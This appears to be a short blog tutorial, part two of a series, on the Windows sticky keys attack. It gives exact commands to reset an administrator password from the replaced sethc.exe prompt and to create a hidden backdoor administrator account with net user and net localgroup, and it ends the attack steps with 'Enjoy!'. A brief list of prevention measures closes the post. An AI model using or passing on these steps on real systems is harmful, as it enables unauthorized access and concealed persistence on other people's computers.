Sticky keys attack (Part2)

This is part2 of my Intro for the sticky keys attack. After rebooting the system we can hit the Shift key 5 times to open a cmd prompt. (replacement of sethc.exe)


Now we can use the GUI or the cmd to install a backdoor user.

Method 1: GUI

In the cmd prompt we type: control userpasswords2

Choose User that is part of the administrator group and reset password or create one.



Method 2: Use the cmd

Get administrators list: net localgroup administrators

(You’ll get a list with all users that belong to the local admin group)

change password by typing: net user „username“ password

In that case rootsh3ll is the username and pass the new password

Login with new credentials, Enjoy!

Howto create a backdoor User

Create a new user: net user /add hiddenuser secretpassword

Add User to local admin group: net localgroup administrators hiddenuser /add

set user to hidden: net user hiddenuser /active:no


Check backdoor user visibility: control userpasswords2

The hiddenuser should not be shown.

Prevention from sticky boot attack

  • encrypt your harddrive
  • set bios password
  • disable additional boot device possibilty (Flashdrives/USB/CD/DVD)
  • Turn off Sticky keys:




Ersten Kommentar schreiben


Deine E-Mail-Adresse wird nicht veröffentlicht.